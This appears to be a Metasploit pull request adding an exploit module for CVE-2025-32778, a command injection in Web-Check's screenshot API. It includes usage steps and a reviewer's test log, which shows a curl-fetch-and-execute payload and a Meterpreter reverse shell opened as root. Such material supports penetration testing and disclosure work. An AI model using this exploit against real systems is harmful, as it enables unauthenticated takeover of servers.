Add Web-Check screenshot API command injection RCE exploit (CVE-2025-32778)

[Chocapikk]

Hello Metasploit Team,

This PR adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint. The vulnerability allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use exploit/multi/http/web_check_screenshot_rce
• set RHOSTS <target_ip>
• set RPORT 3000
• set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
• set LHOST <listener_ip>
• run
• Verify the module detects the vulnerability via timing-based check
• Verify a meterpreter session is established
• Verify commands can be executed in the session

[bwatters-r7]

msf exploit(multi/http/web_check_screenshot_rce) > show options

Module options (exploit/multi/http/web_check_screenshot_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks4, s
                                         ocks5, socks5h, http, sapni
   RHOSTS     10.5.135.119     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      3000             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Web-Check
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, GET, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Lin
                                              ux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_COMMAND is one of CURL,GET,WGET:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.


   When FETCH_FILELESS is none:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      cEDJKJDbPtY      no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Unix/Linux Command



View the full module info with the info, or info -d command.

msf exploit(multi/http/web_check_screenshot_rce) > run
[*] Command to run on remote host: curl -so ./oOdSmVxo http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg;chmod +x ./oOdSmVxo;./oOdSmVxo&
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Testing command injection (baseline: 0.48s)
[*] Sleep 2s: 2.45s (threshold: 1.52s)
[*] Sleep 3s: 3.46s (threshold: 2.52s)
[*] Sleep 4s: 4.45s (threshold: 3.52s)
[+] The target is vulnerable. Command injection vulnerability confirmed via sleep timing
[*] Sending payload via screenshot API
[*] Client 10.5.135.119 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.135.119 (curl/7.74.0)
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.135.119:38502) at 2026-01-12 17:09:12 -0600

meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 11.9 (Linux 6.14.0-1014-azure)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

[bwatters-r7]

Release Notes

Adds an exploit module for CVE-2025-32778, a command injection vulnerability in Web-Check's screenshot API endpoint which allows unauthenticated remote code execution by injecting shell commands via URL query parameters in the /api/screenshot endpoint.